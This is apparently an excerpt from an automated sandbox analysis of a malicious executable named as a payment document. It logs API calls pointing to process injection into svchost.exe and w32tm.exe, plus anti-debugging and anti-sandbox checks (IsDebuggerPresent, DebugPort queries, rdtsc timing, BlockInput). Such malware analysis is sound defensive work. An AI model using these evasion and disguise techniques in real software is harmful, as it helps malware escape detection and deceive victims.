Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DECAA0 FindFirstFileW,FindNextFileW,FindClose,	3_2_00DECAA0

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008E42DE

Source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4152710956.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2254839179.000002A3402BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_036AD1C0 rdtsc

1_2_036AD1C0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417D03 LdrLoadDll,

1_2_00417D03

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0095EAA2 BlockInput,

0_2_0095EAA2

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00912622

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008E42DE

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00904CE8 mov eax, dword ptr fs:[00000030h]	0_2_00904CE8
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_041C0710 mov eax, dword ptr fs:[00000030h]	0_2_041C0710
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_041C0770 mov eax, dword ptr fs:[00000030h]	0_2_041C0770
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_041BF0E0 mov eax, dword ptr fs:[00000030h]	0_2_041BF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF367 mov eax, dword ptr fs:[00000030h]	1_2_036EF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]	1_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]	1_2_03637370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]	1_2_03637370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637370 mov eax, dword ptr fs:[00000030h]	1_2_03637370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]	1_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C mov eax, dword ptr fs:[00000030h]	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705341 mov eax, dword ptr fs:[00000030h]	1_2_03705341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]	1_2_03629353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629353 mov eax, dword ptr fs:[00000030h]	1_2_03629353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]	1_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D mov eax, dword ptr fs:[00000030h]	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365F32A mov eax, dword ptr fs:[00000030h]	1_2_0365F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03627330 mov eax, dword ptr fs:[00000030h]	1_2_03627330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]	1_2_036B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]	1_2_036B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B930B mov eax, dword ptr fs:[00000030h]	1_2_036B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]	1_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]	1_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF3E6 mov eax, dword ptr fs:[00000030h]	1_2_036EF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037053FC mov eax, dword ptr fs:[00000030h]	1_2_037053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]	1_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]	1_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]	1_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]	1_2_036EB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036533A5 mov eax, dword ptr fs:[00000030h]	1_2_036533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]	1_2_036633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]	1_2_036633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]	1_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]	1_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370539D mov eax, dword ptr fs:[00000030h]	1_2_0370539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]	1_2_036FD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]	1_2_036FD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]	1_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03659274 mov eax, dword ptr fs:[00000030h]	1_2_03659274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]	1_2_03671270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]	1_2_03671270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]	1_2_03629240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]	1_2_03629240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]	1_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]	1_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366724D mov eax, dword ptr fs:[00000030h]	1_2_0366724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]	1_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]	1_2_036EB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]	1_2_036EB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]	1_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705227 mov eax, dword ptr fs:[00000030h]	1_2_03705227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]	1_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]	1_2_03667208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]	1_2_03667208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037052E2 mov eax, dword ptr fs:[00000030h]	1_2_037052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF2F8 mov eax, dword ptr fs:[00000030h]	1_2_036EF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036292FF mov eax, dword ptr fs:[00000030h]	1_2_036292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]	1_2_036392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]	1_2_036392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0362B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0362B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0362B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]	1_2_0365F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]	1_2_0365F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]	1_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]	1_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]	1_2_036C72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]	1_2_036C72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]	1_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]	1_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705283 mov eax, dword ptr fs:[00000030h]	1_2_03705283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]	1_2_0366329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]	1_2_0366329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
